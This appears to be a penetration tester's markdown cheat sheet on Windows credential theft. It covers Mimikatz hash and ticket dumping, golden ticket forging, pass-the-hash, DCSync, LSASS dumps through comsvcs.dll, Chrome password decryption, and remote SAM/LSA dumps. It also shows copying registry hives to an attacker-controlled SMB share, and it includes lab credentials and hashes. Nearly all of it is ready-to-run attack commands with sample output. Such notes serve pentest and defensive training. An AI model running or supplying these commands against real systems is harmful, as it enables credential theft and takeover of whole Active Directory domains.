# Mimikatz

## Tables of Contents

* [Mimikatz](#mimikatz)
  * [Tables of Contents](#tables-of-contents)
  * [Run](#run)
  * [Dump hashes](#dump-hashes)
  * [Crack with hashcat](#crack-with-hashcat)
  * [Golden Ticket](#golden-ticket)
  * [Create the Golden Ticket](#create-the-golden-ticket)
  * [Use the Ticket](#use-the-ticket)
  * [DPAPI](#dpapi)
* Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network
* Transfer mimikatz.exe to the target

## Run

```
./mimikatz.exe
```

* Ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator.
* If you don't run mimikatz as an administrator, mimikatz will not run properly

```
privilege::debug 
```

## Dump hashes

```
lsadump::lsa /patch
```

## Mimikatz .kirbi extraction

```
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # standard::base64 /output:true
mimikatz # kerberos::list /export
```

## Carve Tickets out of LSASS Memory

* Mimikatz can carve tickets directly out of LSASS memory

```
mimikatz # privilege::debug
mimikatz # standard::base64 /output:true
mimikatz # sekurlsa::tickets /export

Using 'out.txt' for logfile : OK

mimikatz # kerberos::list /export
--OR--
sekurlsa::tickets /export
```

## Crack with hashcat

```
hashcat -m 1000 <hash> rockyou.txt
```

## Golden Ticket

* Again using the mimikatz as the previous task; however, this time we'll be using it to create a golden ticket.
* We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.
* This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket

```
lsadump::lsa /inject /name:krbtgt
```

* Output should look like this:

```
mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf 
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 * WDigest
    01  49a8de3b6c7ae1ddf36aa868e68cd9ea
    02  7902703149b131c57e5253fd9ea710d0
    03  71288a6388fb28088a434d3705cc6f2a
    04  49a8de3b6c7ae1ddf36aa868e68cd9ea
    05  7902703149b131c57e5253fd9ea710d0
    06  df5ad3cc1ff643663d85dabc81432a81
    07  49a8de3b6c7ae1ddf36aa868e68cd9ea
    08  a489809bd0f8e525f450fac01ea2054b
    09  19e54fd00868c3b0b35b5e0926934c99
    10  4462ea84c5537142029ea1b354cd25fa
    11  6773fcbf03fd29e51720f2c5087cb81c
    12  19e54fd00868c3b0b35b5e0926934c99
    13  52902abbeec1f1d3b46a7bd5adab3b57
    14  6773fcbf03fd29e51720f2c5087cb81c
    15  8f2593c344922717d05d537487a1336d
    16  49c009813995b032cc1f1a181eaadee4
    17  8552f561e937ad7c13a0dca4e9b0b25a
    18  cc18f1d9a1f4d28b58a063f69fa54f27 
    19  12ae8a0629634a31aa63d6f422a14953
    20  b6392b0471c53dd2379dcc570816ba10
    21  7ab113cb39aa4be369710f6926b68094
    22  7ab113cb39aa4be369710f6926b68094
    23  e38f8bc728b21b85602231dba189c5be
    24  4700657dde6382cd7b990fb042b00f9e
    25  8f46d9db219cbd64fb61ba4fdb1c9ba7
    26  36b6a21f031bf361ce38d4d8ad39ee0f
    27  e69385ee50f9d3e105f50c61c53e718e
    28  ca006400aefe845da46b137b5b50f371
    29  15a607251e3a2973a843e09c008c32e3 

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4 
```

## Create the Golden Ticket

* You will need the:
* Domain SID (S-1-5-21-849420856-2351964222-986696166)
* USER (krbtgt)
* NTLM (5508500012cc005cf7082a9a89ebdfd)
* Create a Golden Ticket

```
kerberos::golden /user: /domain: /sid: /krbtgt: /id:
```

* To create a golden ticket based on the output above we would use:

```
Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-3893474861-143125734-211
2006029 /krbtgt:78558f004296a6f9438f4532164a7acd /id:500
```

* Output should look like this:

```
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-3893474861-143125734-2112006029
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 78558f004296a6f9438f4532164a7acd - rc4_hmac_nt
Lifetime  : 8/8/2021 4:37:58 PM ; 8/6/2031 4:37:58 PM ; 8/6/2031 4:37:58 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
```

## Use the Ticket

* Use the Golden Ticket to access other machines:

```
misc::cmd
```

* This will open a new command prompt with elevated privlages to all machines
* Access other Machines! - You will now have another command prompt with access to all other machines on the network

## Single-Shot Execution

When in a non-interactive shell (e.g. PS-Session, sliver execute), run mimikatz as a one-liner:

```
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
.\mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit
```

## Credential Manager and Vault

When hunting for cached clear-text credentials, always run both of these:

```
mimikatz # sekurlsa::credman
mimikatz # vault::cred
```

`sekurlsa::credman` dumps Credential Manager entries from LSASS. `vault::cred` dumps Windows Vault stored credentials.

## Pass the Hash (sekurlsa::pth)

Spawn a process authenticated as a different user using their NT hash:

```
mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe" exit
```

From the spawned cmd.exe you can access remote shares:

```cmd
dir \\DC01\C$
type \\DC01\david\david.txt
```

## DCSync

Requires Domain Admin or replication rights. Extract a specific user's hash from the domain controller:

```
.\mimikatz.exe "lsadump::dcsync /domain:domain.htb /user:Administrator" "exit"
```

## DPAPI

* Credit for below section:
* <https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz>

```
mimikatz # sekurlsa::dpapi
```

* See blog post

## LSASS Dump Methods

### Task Manager

* Open Task Manager → Details tab → right-click `lsass.exe` → Create dump file
* Output: `%temp%\lsass.DMP`

### Find LSASS PID

```
tasklist /svc | findstr lsass
```

```powershell
Get-Process lsass
```

### Dump via comsvcs.dll (rundll32)

```powershell
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
```

Replace `672` with the actual LSASS PID.

## Pypykatz (Offline LSASS Parsing)

* Parse LSASS dump on Linux without Mimikatz

```
pypykatz lsa minidump /home/peter/Documents/lsass.dmp
```

Extracts: MSV (NT/SHA1 hashes), WDIGEST (cleartext on older systems), Kerberos tickets, DPAPI masterkeys.

## DPAPI Chrome Credential Decryption

```
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
```

## Remote SAM Dump (NetExec)

```
netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
```

## Remote LSA Secrets Dump (NetExec)

```
netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
```

## Windows Credential Manager

### Credential Storage Paths

* `%UserProfile%\AppData\Local\Microsoft\Vault\`
* `%UserProfile%\AppData\Local\Microsoft\Credentials\`
* `%UserProfile%\AppData\Roaming\Microsoft\Vault\`
* `%ProgramData%\Microsoft\Vault\`

### Export Vault

```
rundll32 keymgr.dll,KRShowKeyMgr
```

### Enumerate Saved Credentials

```
cmdkey /list
```

### Impersonate with Saved Credentials

```
runas /savecred /user:SRV01\mcharles cmd
```

> `sekurlsa::credman` and `vault::cred` extraction covered in [Credential Manager and Vault](#credential-manager-and-vault) above.

## SAM / SYSTEM / SECURITY Hive Extraction

### Copy Registry Hives

```
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
```

Hive purposes: SAM = password hashes, SYSTEM = boot key to decrypt SAM, SECURITY = cached domain creds + DPAPI keys.

### Transfer via Impacket SMB Server

```
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
```

```
move sam.save \\10.10.15.16\CompData
move security.save \\10.10.15.16\CompData
move system.save \\10.10.15.16\CompData
```

### Dump Hashes with secretsdump

```
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```